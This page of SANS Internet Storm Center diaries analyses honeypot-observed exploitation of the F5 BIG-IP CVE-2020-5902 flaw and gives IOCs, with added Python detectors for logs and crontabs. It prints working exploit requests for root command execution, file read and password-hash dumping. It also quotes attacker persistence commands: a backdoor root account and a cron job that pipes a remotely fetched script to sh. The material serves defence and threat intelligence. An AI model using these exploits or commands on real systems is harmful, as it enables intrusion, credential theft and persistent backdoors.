SANS Internet Storm Center
Latest Diaries

F5 BigIP vulnerability exploitation followed by a backdoor implant attempt

Published: 2020-07-07
Last Updated: 2020-07-07 20:12:05 UTC
by Renato Marinho (Version: 1)

While monitoring SANS Storm Center's honeypots today, I came across the second F5 BIGIP CVE-2020-5902 vulnerability exploitation followed by a backdoor deployment attempt. The first one was seen by Johannes yesterday [1].

Running the backdoor binary (ELF) on a separate system, it was possible to verify that it establishes an SSL connection to the address web[.]vpnkerio.com (152[.]32.180.34:443).

Looking up web[.]vpnkerio.com on VirusTotal while writing this diary, I could find no AV engine flagging the network addresses or the binary hash as malicious.

For persistence, it writes a line to the "/etc/init.d/rc.local" file in an attempt to start on system boot.

Examining the binary statically, it is possible to see the string python -c 'import pty;pty.spawn("/bin/sh")'. It will require more analysis, but it may be used to give the attacker an interactive terminal on the target system. A proper terminal is usually required to run commands like 'su'.

IOCs:

Exploitation attempt source:
96[.]45.187.52

Backdoor URL:
http://104[.]238.140.239:8080/123

C2 communication:
web[.]vpnkerio.com
152[.]32.180.34:443

The backdoor binary:
90ce1320bd999c17abdf8975c92b08f7 (MD5)
a8acda5ddfc25e09e77bb6da87bfa157f204d38cf403e890d9608535c29870a0 (SHA256)

References

[1] https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter


Happy Birthday DShield: DShield.org was registered 20 years ago.

Published: 2020-07-07
Last Updated: 2020-07-07 18:07:14 UTC
by Johannes Ullrich (Version: 1)

And all DShield wants for its Birthday is your logs :). See here for details.


Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits

Published: 2020-07-06
Last Updated: 2020-07-07 16:29:52 UTC
by Johannes Ullrich (Version: 1)

Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks BigIP vulnerability patched last week. Most of the exploits can be considered reconnaissance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed.

Thanks to Renato for creating a partial map of the IPs hitting our honeypot so far:

The simplest way to achieve limited command execution is to use BigIP command-line interface (tmsh) commands, but what they can do is somewhat limited. To achieve full-featured command execution, it is possible to create a tmsh alias that points to "bash".

The result is full code execution in three steps (these requests can use POST or GET; I am using GET here to make them easier to display):

1. Create an "alias" to map the "list" command to "bash"

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'

{"error":"","output":""}

2. Write a file to /tmp with the command to be executed

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}

4. Optionally: remove the alias.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

{"error":"","output":""}

If you do not need code execution, you can also use "Step 2" to write files, or you can just read arbitrary files in one step using:

curl -k 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release 15.1.0.1 (Final)\n"}

Instead of defining an alias, the technique in step 1 can also be used to execute BigIP CLI commands directly, for example to retrieve password hashes (note this only works if the alias is not defined):

curl 'https://f5.sans.edu//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {\n    description \"Admin User\"\n    encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx\/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi\/\n    partition Common\n    partition-access {\n        all-partitions {\n            role admin\n        }\n    }\n    shell none\n}\n"}
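As an added example (not part of the diary), here is a small Python log scanner that flags the request pattern walked through above: a URL path containing the "..;" sequence that reaches tmshCmd.jsp, fileSave.jsp or fileRead.jsp, with the tmsh command or file name pulled out of the query string. The access-log lines and the 198.51.100.7 / 10.0.0.5 addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format); not real honeypot data.
# 198.51.100.7 plays the attacker, 10.0.0.5 a legitimate admin on the management network.
SAMPLE_LOG = """\
198.51.100.7 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash HTTP/1.1" 200 24
198.51.100.7 - - [06/Jul/2020:10:01:03 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id HTTP/1.1" 200 0
198.51.100.7 - - [06/Jul/2020:10:01:04 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd HTTP/1.1" 200 90
198.51.100.7 - - [06/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 200 40
10.0.0.5 - admin [06/Jul/2020:10:02:00 +0000] "GET /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[\d.]+"')
# The authentication bypass relies on the "..;" sequence appearing in the URL path.
TRAVERSAL_RE = re.compile(r"\.\.;")
WORKSPACE_RE = re.compile(r"/tmui/locallb/workspace/(tmshCmd|fileSave|fileRead)\.jsp$", re.I)

def analyse_request(src, method, target):
    """Return a finding for one request, or None if it shows no bypass pattern."""
    parts = urlsplit(target)
    path = unquote(parts.path)                 # normalise percent-encoding before matching
    if not TRAVERSAL_RE.search(path):
        return None                            # ordinary /tmui traffic, leave it alone
    m = WORKSPACE_RE.search(path)
    if not m:
        return None
    jsp = m.group(1)
    params = parse_qs(parts.query)             # parse_qs decodes '+' and %xx for us
    first = lambda k: params.get(k, [""])[0]
    if jsp == "tmshCmd":
        detail = first("command")              # tmsh command, e.g. the alias trick
    elif jsp == "fileSave":
        detail = f"{first('fileName')} <- {first('content')}"  # arbitrary file write
    else:
        detail = first("fileName")             # arbitrary file read
    return {"src": src, "method": method, "endpoint": jsp, "detail": detail}

def scan_log(text):
    """Run analyse_request over every parseable line; returns the list of findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            f = analyse_request(*m.groups())
            if f:
                findings.append(f)
    return findings
```

Feeding the real honeypot or BIG-IP management-interface access log through scan_log() gives one record per bypass request, with the command or file name ready for triage.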

Most of the commands I have seen so far are "id", "ls" and retrieving files like "/etc/passwd" and the BigIP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:

curl 217.12.199.179/b.sh|sh

which retrieves:

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
  LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
  LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
  ) | crontab -
fi

This will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.
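The cron entry above and the rc.local line from Renato's diary are both host-side persistence artifacts worth sweeping for. As an added example (not code from either diary), this Python helper scans crontab -l output and an rc.local file for a fetch piped into a shell, anything launched from a world-writable directory, and the pty.spawn one-liner; the sample contents, the 203.0.113.9 address and the /tmp path are constructed placeholders.

```python
import re

# A curl/wget fetch piped straight into sh or bash, as in the cron line from the diary.
FETCH_PIPE_SH = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
# Anything launched from a world-writable directory, a common home for dropped ELF backdoors.
TMP_EXEC = re.compile(r"(^|[\s;|&(])(/tmp|/var/tmp|/dev/shm)/\S+")

def suspicious_command(cmd):
    """Return a short reason if cmd matches a persistence pattern from the diaries, else None."""
    if FETCH_PIPE_SH.search(cmd):
        return "remote script piped to shell"
    if TMP_EXEC.search(cmd):
        return "executes from world-writable directory"
    if "pty.spawn" in cmd:
        return "spawns an interactive pty shell"
    return None

def _entries(text):
    """Yield stripped, non-empty, non-comment lines."""
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#"):
            yield s

def check_crontab(text):
    """Scan `crontab -l` output; returns (schedule, command, reason) per hit."""
    findings = []
    for s in _entries(text):
        fields = s.split(None, 5)
        if len(fields) < 6:                    # VAR=value lines, not schedule entries
            continue
        reason = suspicious_command(fields[5])
        if reason:
            findings.append((" ".join(fields[:5]), fields[5], reason))
    return findings

def check_rc_local(text):
    """Scan an rc.local file; returns (line, reason) per hit."""
    return [(s, r) for s in _entries(text) if (r := suspicious_command(s))]

# Constructed samples; 203.0.113.9 and the /tmp path are placeholders, not the diaries' IOCs.
SAMPLE_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * wget -q -O - http://203.0.113.9/b.sh | sh > /dev/null 2>&1
"""
SAMPLE_RC_LOCAL = """\
/tmp/.cache/backdoor_placeholder &
exit 0
"""
```

On a live host, pass the output of crontab -l for each user (root included) and the contents of /etc/init.d/rc.local or /etc/rc.local to the two check functions.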

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

Keywords: bigip cve20205902 f5
